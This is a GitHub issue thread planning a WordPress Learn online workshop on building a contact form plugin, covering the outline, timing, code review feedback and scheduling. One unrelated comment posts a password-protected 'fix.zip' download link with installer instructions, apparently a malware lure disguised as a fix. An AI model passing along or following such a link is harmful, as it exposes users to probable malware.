### ISSUE TITLE
Online Workshop: Creating Your Own Simple Contact Form Plugin

### ISSUE THREAD

**Issue by laxmariappan** [WordPress/Learn#2861]
# Details

- Topic description: Attendees will learn how to create a basic contact form plugin for their WordPress website.
- Audience (User, Developer, Designer, Contributor, etc.): Developers - Beginner level
- Learning objectives (What will the learner be able to do as a result of this content?): 

  - Understand the core components of a WordPress plugin.
  - Create a custom admin page for the plugin.
  - Add a contact form to the frontend of the website.
  - Handle form submissions.
  - Validate form input to prevent spam.

- Content type (Online Workshop, Lesson, Course, Tutorial, or Lesson Plan): Online Workshop
- WordPress version (optional): 
- Will you be creating this content? (Yes or No): Yes

### Plugin Structure:

- Creating a plugin directory and header file.
- Registering the plugin with WordPress.
- Creating an admin page for the plugin.

### Form Creation:

- Using HTML to create a contact form.
- Styling the form with CSS.
- Handling form submissions using PHP.
- Adding a success message after successful submission.

### Form Validation:

- Using PHP to validate form input.
- Preventing spam submissions.

### Workshop Outline:
**Introduction:** Explain the purpose of the workshop and the steps involved in creating a contact form plugin.
**Plugin Structure:** Create a new plugin directory and header file. Register the plugin with WordPress.
**Admin Page:** Create a custom admin page for the plugin to configure settings.
**Form Creation:** Add a contact form to a template file or create a custom template.
**Form Submission:** Handle form submissions using PHP. Add optional features like a success message.
**Form Validation:** Implement basic form validation to prevent spam submissions.
**Testing and Debugging:** Test the plugin to ensure it works as expected and debug any issues.

# Related Resources

https://wordpress.tv/2022/07/22/lets-code-creating-your-first-wordpress-plugin/
https://wordpress.tv/2024/05/24/plugin-api-hooks/

# Next steps for SMEs
Please follow the team handbook "[Vetting topic ideas](https://make.wordpress.org/training/handbook/training-team-how-to-guides/vetting-topic-ideas/)" to vet this topic.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jonathanbossenger** [comment]
@laxmariappan This sounds like an excellent topic for an Online Workshop.

I would mention that it is a lot to fit into a 40-minute session. You can probably code it yourself in under 40 minutes, but you also need to consider waiting for folks to keep up with you or answering questions as you go.

So, one option to consider is what parts could be left until last and maybe left out entirely if you run out of time.

The other option, if you want to cover it all and you do run out of time, is to consider planning for a follow-up session to cover whatever was missed.  

Which of these two options is your preference?

**Comment by laxmariappan** [comment]
awesome suggestions @jonathanbossenger 

I agree with you, there is a lot to cover in one session.

I am thinking of skipping admin page and debugging.

I assume the participants would have HTML and PHP knowledge as they are beginner WordPress developers.

5 minutes - Introduction: Explain the purpose of the workshop and the steps involved in creating a contact form plugin.
5 minutes - Plugin Structure: Create a new plugin directory and header file. Register the plugin with WordPress.
10 minutes - Form Creation: Add a contact form to a template file or create a custom template.
10 minutes - Form Submission: Handle form submissions using PHP. Add optional features like a success message.
5 minutes - Form Validation: Implement basic form validation to prevent spam submissions.
10 or more minutes for question and answers and discussions.

I would like to share the repo (code) at the beginning of the session, so everyone can follow along.

What do you think?

**Comment by jonathanbossenger** [comment]
> I am thinking of skipping admin page and debugging.

That's a good idea.

> I assume the participants would have HTML and PHP knowledge as they are beginner WordPress developers.

Since this is an online workshop, it is possible that folks without that knowledge might also attend, so you may need to account for that a little.

You also need to anticipate questions that might come up during the workshop, which could take up extra time. 

As such, my suggestion is to anticipate that you might not have enough time to cover the following.
- optional features like a success message.
- Form Validation: Implement basic form validation to prevent spam submissions.

I would still plan for it though. I always plan 100% of my content for an online workshop, but then I anticipate only being able to cover 75% of it. That way, if I run out of time, I'm not missing anything, but if it goes exceptionally well, I have extra content to present. 

All in all, I think we're in a good place to start setting up the workshop dates.

Next steps would be to choose a date and time. It would need to be a time when we're both around. I am at UTC+2, and my usual work hours are between 06:00UTC and 15:00 UTC.

**Comment by laxmariappan** [comment]
Thanks for the feedback, Jonathan 👍

I'll make sure to add or explain the HTML tags and PHP functions in more detail, so even a complete beginner can understand.

I agree with your suggestion about potentially skipping optional features like a success message.

Regarding form validation, I think it would be best to skip that part for now. Sanitization and validation can be complex to demonstrate and explain in depth.

I will add another branch in the repo, that has code with sanitization and validation.

9:00 UTC to 13 UTC sounds like a good time to me. I can adjust the hours if necessary.

**Comment by jonathanbossenger** [comment]
@laxmariappan sounds like a plan.

Shall we plan this for one day next week? Which day suits you? Would you prefer to host it earlier (closer to 09:00 UTC) or later (closer to 13:00 UTC)

**Comment by laxmariappan** [comment]
@jonathanbossenger I'm available throughout the week. 

Let's pick Tuesday, Wednesday or Thursday. 

I start my day at 8:00 UTC and available till 16:00 UTC

**Comment by jonathanbossenger** [comment]
@laxmariappan ok, how does next Wednesday the 11th work for you? 

I am online between 06:00UTC and 15:00UTC, and I only have a meeting from 14:00 - 15:00 UTC next Wednesday, so feel free to pick a time that works for you before that.

**Comment by laxmariappan** [comment]
@jonathanbossenger how about 12 UTC? If needed, we can choose earlier hours like 10 or 11 UTC as well.

**Comment by jonathanbossenger** [comment]
@laxmariappan nope, 12UTC works for me as well, let's do it then. I will create the event on the meetup.com group, and share it here shortly.

**Comment by jonathanbossenger** [comment]
//online-workshop

**Comment by jonathanbossenger** [comment]
@laxmariappan ok, the meetup has been created at https://www.meetup.com/learn-wordpress-online-workshops/events/303210069/, and added to the Learn WordPress calendar: https://learn.wordpress.org/online-workshops/

2 things I'd like to suggest we do between now and then.
- please share your final code example or repo so I can review it before the time
- would you like to have a quick Zoom test before the actual date, so we can make sure everything works as expected.

**Comment by laxmariappan** [comment]
@jonathanbossenger thanks for creating the event.
I'll share the code on Thursday (5th September) and we can do the Zoom test anytime when you are available

**Comment by jonathanbossenger** [comment]
Ok cool, let's set up that call after you've shared the code, in case there's anything there we want to cover.

**Comment by laxmariappan** [comment]
@jonathanbossenger here is the gist for the plugin code.

https://gist.github.com/laxmariappan/d3f324c21bbe1d11c8a61ae89fbf0000

I've tried using page templates, they get tricky for block themes vs classic themes. So to avoid any extra stuff, I've used shortcodes.

I'll be creating a public repo and create a branch for each step, so users can checkout / switch to steps along the way.

I haven't used assests (css and js files or extra libraries) to keep this minimal.

Looking forward to hearing your feedback, I will update the code accordingly.

Thanks

**Comment by laxmariappan** [comment]
@jonathanbossenger Here is the public repo.

Can you please review this repo (code) instead of the previously shared GitHub gist

https://github.com/laxmariappan/lwp-contact-form

The participants can checkout branches step-1, step-2 etc to follow along.

Step 8, 9, 10 and 11 can be covered if we have time

- `step-8` - Adds the nonce field.
- `step-9` - Adds the sanitization of form data.
- `step-10` - Save form entry to the database.
- `step-11` - Display form entries values in the admin.

Thanks

**Comment by jonathanbossenger** [comment]
@laxmariappan, thanks for your patience while I review the code. It looks great, and will definitely fill in the entire hour for the workshop. I have two sets of feedback. The first is a list of personal opinions and suggestions, which you are free to ignore. The second is a list of recommendations of things I think should be changed, along with reasons why. 

## Opinions/suggestions
- I generally don't teach beginners plugin development using classes, but that's a personal preference.
- When it comes to registering hooks in a class, it's a general recommendation to move the hook registration to a separate class method (you can read more about the reasons [why here](https://carlalexander.ca/designing-class-wordpress-hooks/))
- I don't have a problem with you showing how it's possible to put the styles inline in this way, as long as you mention that it's better to use the enqueueing functions. 

## Recommendations
- Array declaration:  WordPress Coding Standards suggest using the [long array syntax](https://developer.wordpress.org/coding-standards/wordpress-coding-standards/php/#declaring-arrays) to declare arrays. I'm ok with leaving the short array syntax, but maybe you can cover the long syntax in the workshop as well for folks who may have never seen it before 
- Anonymous Functions (hooked into the the_content callback filter). I'd strongly recommend using a regular function callback here, as WPCS strongly recommends [not using anonymous functions for filter or action callbacks](https://developer.wordpress.org/coding-standards/wordpress-coding-standards/php/#closures-anonymous-functions).

Let me know if you have any questions about anything.

**Comment by laxmariappan** [comment]
Thanks @jonathanbossenger.

I agree with suggestions and recommendations. 

I will update the code accordingly.

**Comment by jonathanbossenger** [comment]
31 attendees

**Comment by jonathanbossenger** [comment]
WordPress.tv video: https://wordpress.tv/2024/09/12/creating-your-own-contact-form-plugin/

**Comment by jonathanbossenger** [comment]
YouTube video: https://youtu.be/FA7Sgwnc7-4

**Comment by jonathanbossenger** [comment]
I'm closing this issue as the last workshop steps have been completed. 

@laxmariappan when you're ready, you can go ahead and create the issue for part 2.
